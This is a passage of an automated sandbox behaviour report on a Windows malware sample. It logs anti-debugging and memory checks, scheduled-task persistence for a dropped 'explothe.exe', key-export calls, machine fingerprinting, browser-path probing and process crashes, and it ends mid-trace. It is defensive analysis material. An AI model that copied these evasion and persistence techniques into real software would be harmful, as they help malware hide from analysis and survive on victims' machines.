GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2023, 9:45 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 61 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 16, 2023, 9:44 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:44 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:44 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:37 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:44 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:44 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:44 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:44 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0
IsDebuggerPresent Oct. 16, 2023, 9:45 a.m.			0	0

Command line console output was observed (50 out of 98 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 16, 2023, 9:44 a.m.	buffer: SUCCESS: The scheduled task "\WindowsAppPool\7XUI4o616d4Syjf" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Oct. 16, 2023, 9:44 a.m.	buffer: SUCCESS: The scheduled task "explothe.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 16, 2023, 9:44 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: d console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: f console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: i console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: l console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleW Oct. 16, 2023, 9:44 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\fefffe8cea\explothe.exe console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Oct. 16, 2023, 9:44 a.m.	buffer: u console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 110 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6ad0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004e6c90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0054ed38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0054ed38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0054ebf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c99f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9fb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003c9bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2023, 9:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003ca438 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (4 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 16, 2023, 9:44 a.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 67 events)

Time & API	Arguments	Status
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x8c86cd 0x8c849e 0x8c6cad 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8c8808 registers.esp: 3927460 registers.edi: 3927512 registers.eax: 0 registers.ebp: 3927524 registers.edx: 4860200 registers.ebx: 3928740 registers.esi: 42700680 registers.ecx: 0	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x7674050 0x7673b01 0x7673a1d 0x7672123 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926048 registers.edi: 3926332 registers.eax: 0 registers.ebp: 3926056 registers.edx: 0 registers.ebx: 3928740 registers.esi: 43517804 registers.ecx: 44643948	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x7674050 0x7673b01 0x7673a35 0x7672123 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f3f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7677f8b registers.esp: 3926048 registers.edi: 3926332 registers.eax: 0 registers.ebp: 3926056 registers.edx: 0 registers.ebx: 3928740 registers.esi: 43517804 registers.ecx: 45949888	1
__exception__ Oct. 16, 2023, 9:44 a.m.	stacktrace: 0x7677f48 0x7674050 0x7673b01 0x7673a35 0x7672123 0x76713e6 0x8cc7af 0x8c6d75 0x8c6886 0x8c34ab 0x8c2f10 0x8c2ea3 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 